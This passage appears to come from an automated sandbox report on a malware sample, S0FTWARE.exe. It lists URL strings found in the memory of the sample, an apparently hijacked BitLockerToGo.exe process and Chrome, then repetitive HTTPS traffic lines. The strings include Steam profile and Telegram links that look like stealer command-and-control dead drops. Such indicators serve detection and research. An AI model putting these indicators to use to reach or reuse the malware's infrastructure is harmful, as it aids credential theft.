                        Source: S0FTWARE.exe, 00000000.00000003.2190648021.0000000013764000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000003.2190577336.00000000137EE000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000002.2247124098.000000001376C000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000002.2247358214.0000000013A5C000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000002.2246493920.0000000013471000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000003.2190136482.000000001387E000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000002.2247221901.0000000013880000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199801589826r08etMozilla/5.0
                        Source: BitLockerToGo.exe, 00000003.00000003.3053644888.000000001DF04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                        Source: BitLockerToGo.exe, 00000003.00000003.3053644888.000000001DF04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
                        Source: S0FTWARE.exe, 00000000.00000002.2246034055.0000000012FC4000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000003.2193253701.0000000012FC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.co/
                        Source: S0FTWARE.exe, 00000000.00000002.2237517931.0000000012C28000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.co/09AZaz
                        Source: S0FTWARE.exe, 00000000.00000002.2246034055.0000000012FC4000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000003.2193253701.0000000012FC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.co/https://t.co/GetCursorPos
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002E5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002E5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/$;
                        Source: S0FTWARE.exe, 00000000.00000003.2190648021.0000000013764000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000003.2190577336.00000000137EE000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000002.2247124098.000000001376C000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000002.2247358214.0000000013A5C000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000002.2246493920.0000000013471000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000003.2190136482.000000001387E000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000002.2247221901.0000000013880000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, BitLockerToGo.exe, 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002E88000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2482726756.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2464873825.0000000002E90000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2512683354.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2464873825.0000000002E83000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2542381129.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2497975928.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2527471317.0000000002E8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/m07mbk
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002E5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/m07mbkW/
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002E5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/m07mbkY/
                        Source: S0FTWARE.exe, 00000000.00000003.2190648021.0000000013764000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000003.2190577336.00000000137EE000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000002.2247124098.000000001376C000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000002.2247358214.0000000013A5C000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000002.2246493920.0000000013471000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000003.2190136482.000000001387E000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000002.2247221901.0000000013880000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/m07mbkr08etsqlo.dllMozilla/5.0
                        Source: chrome.exe, 00000005.00000002.2736924847.000007C000A24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t0.gstatic.com/faviconV2
                        Source: chrome.exe, 00000005.00000002.2731495740.000007C0001D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tasks.googleapis.com/
                        Source: S0FTWARE.exe, 00000000.00000002.2229780239.000000000107A000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://twitter.comif-unmodified-sinceillegal
                        Source: BitLockerToGo.exe, 00000003.00000003.2464873825.0000000002E90000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2512683354.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2542381129.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2497975928.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2527471317.0000000002E8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002F37000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002E88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002F37000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002E88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
                        Source: BitLockerToGo.exe, 00000003.00000002.3364939118.000000001DFF6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3367821506.0000000023F61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                        Source: BitLockerToGo.exe, 00000003.00000003.2800189829.0000000002F61000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2728075204.0000000002F61000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                        Source: chrome.exe, 00000005.00000002.2737657746.000007C000BB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=
                        Source: chrome.exe, 00000005.00000002.2737657746.000007C000BB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
                        Source: chrome.exe, 00000005.00000002.2737657746.000007C000BB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
                        Source: chrome.exe, 00000005.00000003.2664334552.000007C00033C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com
                        Source: chrome.exe, 00000005.00000002.2732518022.000007C0003F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
                        Source: chrome.exe, 00000005.00000002.2732518022.000007C0003F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                        Source: chrome.exe, 00000005.00000002.2734345767.000007C0006F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734458792.000007C00072C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2738181133.000007C000CC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2733802471.000007C00063C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2654311777.000007C000F24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2735003578.000007C00080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                        Source: chrome.exe, 00000005.00000002.2738181133.000007C000CC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/Char
                        Source: chrome.exe, 00000005.00000002.2735003578.000007C00080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/CharBl3
                        Source: chrome.exe, 00000005.00000002.2737657746.000007C000BB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
                        Source: chrome.exe, 00000005.00000002.2737657746.000007C000BB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2g
                        Source: chrome.exe, 00000005.00000002.2740718077.000007C00102C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/newtab_promos
                        Source: chrome.exe, 00000005.00000003.2675421936.000007C0012E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
                        Source: chrome.exe, 00000005.00000002.2735222773.000007C00085C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2735788481.000007C000920000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2731495740.000007C0001D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2736292118.000007C000964000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/
                        Source: chrome.exe, 00000005.00000002.2735222773.000007C00085C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2735788481.000007C000920000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2731495740.000007C0001D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2736292118.000007C000964000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/gs
                        Source: BitLockerToGo.exe, 00000003.00000003.2800189829.0000000002F61000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2728075204.0000000002F61000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2733051632.000007C000500000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2733495555.000007C0005D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734639165.000007C00075C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737657746.000007C000BB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                        Source: chrome.exe, 00000005.00000002.2732762663.000007C00040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2686584935.000007C001CE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2686757739.000007C001D04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2686922583.000007C001DBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
                        Source: chrome.exe, 00000005.00000003.2686421480.000007C001D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2685697337.000007C001D78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
                        Source: chrome.exe, 00000005.00000003.2675421936.000007C0012E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
                        Source: chrome.exe, 00000005.00000003.2657711015.000007C001110000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=$
                        Source: chrome.exe, 00000005.00000002.2732973511.000007C0004D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
                        Source: chrome.exe, 00000005.00000002.2736962040.000007C000A3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/undo
                        Source: chrome.exe, 00000005.00000003.2664334552.000007C00033C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
                        Source: chrome.exe, 00000005.00000002.2730658183.000007C000038000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/
                        Source: chrome.exe, 00000005.00000003.2675421936.000007C0012E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/aida2
                        Source: chrome.exe, 00000005.00000003.2675421936.000007C0012E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
                        Source: chrome.exe, 00000005.00000003.2675421936.000007C0012E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
                        Source: chrome.exe, 00000005.00000002.2731576572.000007C00020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
                        Source: chrome.exe, 00000005.00000002.2731576572.000007C00020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
                        Source: chrome.exe, 00000005.00000002.2731576572.000007C00020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v4/token
                        Source: chrome.exe, 00000005.00000002.2731576572.000007C00020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
                        Source: chrome.exe, 00000005.00000002.2732518022.000007C0003F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
                        Source: chrome.exe, 00000005.00000002.2732518022.000007C0003F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                        Source: chrome.exe, 00000005.00000002.2732973511.000007C0004D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
                        Source: chrome.exe, 00000005.00000003.2686922583.000007C001DBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50105
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50107
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50109
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50103
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50117
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50116
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50119
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50110
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50115
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50120
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50121
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50123
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50105 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50117 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50140 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50125 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50091 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
